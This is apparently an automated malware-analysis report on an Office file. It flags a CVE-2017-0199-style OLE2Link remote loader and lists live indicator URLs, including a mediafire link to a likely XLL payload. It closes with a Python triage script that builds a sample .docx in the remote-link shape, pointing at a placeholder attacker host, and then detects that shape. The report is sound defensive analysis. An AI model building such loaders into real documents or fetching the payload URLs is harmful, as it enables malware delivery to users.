Verdict: MALICIOUS
Risk Score: 82
Malware Insights
MITRE ATT&CK: T1204.002 User Execution: Malicious File
The document carries the OOXML OLE2Link remote-loader shape associated with CVE-2017-0199: an o:OLEObject of Type="Link" whose oleObject relationship points to a remote URL, which Office resolves through its OLE link-update path rather than as a user-clicked hyperlink. The local file does not contain the URL Moniker bytes or a weaponized content type, so exploitation of that CVE cannot be proven statically, but the shape alone is enough to treat the file as a remote-loader stage. The primary IOC is the mediafire URL pointing to an XLL file (an Excel add-in, that is, a native DLL that Excel loads into its own process), the likely second-stage payload. The document body itself contains no actionable content; the verdict rests on the external OLE relationship and the download-and-execute chain it implies.
Heuristics (3)
- OOXML OLE2Link remote loader, CVE-2017-0199 related (severity: high; rule: CVE_2017_0199_RELATED). Document contains an o:OLEObject Type="Link" whose external oleObject relationship points to a remote URL. This is the OOXML OLE2Link activation shape associated with CVE-2017-0199 delivery, but the local file does not expose URL Moniker bytes or a weaponized extension/content type, so the exact CVE cannot be proven statically.
- External OLE object relationship (severity: high; rule: OOXML_EXTERNAL_OLE_OBJECT). Document contains an oleObject relationship whose target is an external HTTP(S) URL. Office resolves this through OLE/object update paths rather than as a normal user-clicked hyperlink.
- Embedded URL (severity: info; rule: EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs:
  - https://www.mediafire.com/file/8qv8nzje8wymhaj/excelDNALibrary-AddIn64.xll/file (external; the XLL download named in the summary)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (OOXML namespace URI)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (OOXML namespace URI)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (OOXML namespace URI)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (OOXML namespace URI)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (OOXML namespace URI)
  - http://schemas.microsoft.com/office/word/2006/wordml (Office namespace URI)
  - https://urlcallinghta.blogspot.com/atom.xml (external)
  The six schemas.* entries are XML namespace names present in essentially every Word document and are not network indicators; only the two external URLs are worth pivoting on.
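The two OLE heuristics above reduce to a check a triage script can run on the package itself: find oleObject relationships with TargetMode="External" and an HTTP(S) target, then correlate them with o:OLEObject elements of Type="Link" in the Word parts. The Python below is an added example written for this page, not the analyzer's own code. It builds a constructed minimal .docx in both the remote-link shape and an ordinary embedded-object shape (the https://attacker.example/stage2 URL and the ProgID are placeholders, not values from the sample) and also splits every extracted URL into schema namespace names versus external indicators, as the EMBEDDED_URL heuristic does.

```python
"""Static triage of a .docx for the OOXML OLE2Link remote-loader shape.
Added example for this report; it is not the analyzer's own code."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_O = "urn:schemas-microsoft-com:office:office"
REL_OLEOBJECT = NS_R + "/oleObject"
# Hosts that occur in every OOXML package as XML namespace names, not as network indicators.
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org"}
URL_RE = re.compile(rb"https?://[^\s\"'<>]+")


def build_sample_docx(remote: bool) -> bytes:
    """Constructed minimal .docx, not the analyzed sample. remote=True reproduces the
    reported shape; remote=False is an ordinary embedded object for comparison."""
    if remote:
        ole_type = "Link"
        target = 'Target="https://attacker.example/stage2" TargetMode="External"'  # placeholder URL
    else:
        ole_type = "Embed"
        target = 'Target="embeddings/oleObject1.bin"'  # internal part, no TargetMode
    doc_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"
            xmlns:o="{NS_O}" xmlns:r="{NS_R}">
  <w:body><w:p><w:r><w:object>
    <o:OLEObject Type="{ole_type}" ProgID="Word.Document.8" ShapeID="_x0000_i1025"
                 DrawAspect="Content" ObjectID="_1" r:id="rId4"/>
  </w:object></w:r></w:p></w:body>
</w:document>"""
    rels_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{NS_REL}">
  <Relationship Id="rId1" Type="{NS_R}/styles" Target="styles.xml"/>
  <Relationship Id="rId4" Type="{REL_OLEOBJECT}" {target}/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", doc_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def external_ole_relationships(z: zipfile.ZipFile) -> dict:
    """rId -> URL for every oleObject relationship that leaves the package over HTTP(S).
    This is the OOXML_EXTERNAL_OLE_OBJECT condition."""
    found = {}
    for name in z.namelist():
        if not name.endswith(".rels"):
            continue
        for rel in ET.fromstring(z.read(name)).iter(f"{{{NS_REL}}}Relationship"):
            target = rel.get("Target", "")
            if (rel.get("Type") == REL_OLEOBJECT and rel.get("TargetMode") == "External"
                    and target.lower().startswith(("http://", "https://"))):
                found[rel.get("Id")] = target
    return found


def linked_ole_objects(z: zipfile.ZipFile) -> list:
    """r:id of every o:OLEObject with Type="Link" in the Word parts (the OLE2Link side)."""
    ids = []
    for name in z.namelist():
        if not (name.startswith("word/") and name.endswith(".xml")):
            continue
        for obj in ET.fromstring(z.read(name)).iter(f"{{{NS_O}}}OLEObject"):
            if obj.get("Type") == "Link":
                ids.append(obj.get(f"{{{NS_R}}}id"))
    return ids


def extract_urls(z: zipfile.ZipFile) -> dict:
    """Every URL in the package, split into namespace names and real external indicators."""
    schema, external = set(), set()
    for name in z.namelist():
        for raw in URL_RE.findall(z.read(name)):
            url = raw.decode("ascii", "replace")
            host = url.split("/")[2].lower()
            (schema if host in SCHEMA_HOSTS else external).add(url)
    return {"schema": sorted(schema), "external": sorted(external)}


def triage(data: bytes) -> dict:
    """Combine the checks: the CVE-2017-0199 shape needs a Type="Link" object whose
    relationship resolves to an external URL, not merely either condition alone."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        rels = external_ole_relationships(z)
        hits = [rels[rid] for rid in linked_ole_objects(z) if rid in rels]
        return {
            "OOXML_EXTERNAL_OLE_OBJECT": bool(rels),
            "CVE_2017_0199_RELATED": bool(hits),
            "remote_targets": hits,
            "urls": extract_urls(z),
        }


if __name__ == "__main__":
    for label, flag in (("remote-link shape", True), ("embedded object", False)):
        print(label, triage(build_sample_docx(remote=flag)))
```

What the script cannot decide is exactly what the report says it cannot: whether the remote target answers with a weaponized content type when Office fetches it. That depends on the server's response headers, so resolve the URL only from a sandboxed analysis host, never from the triage machine.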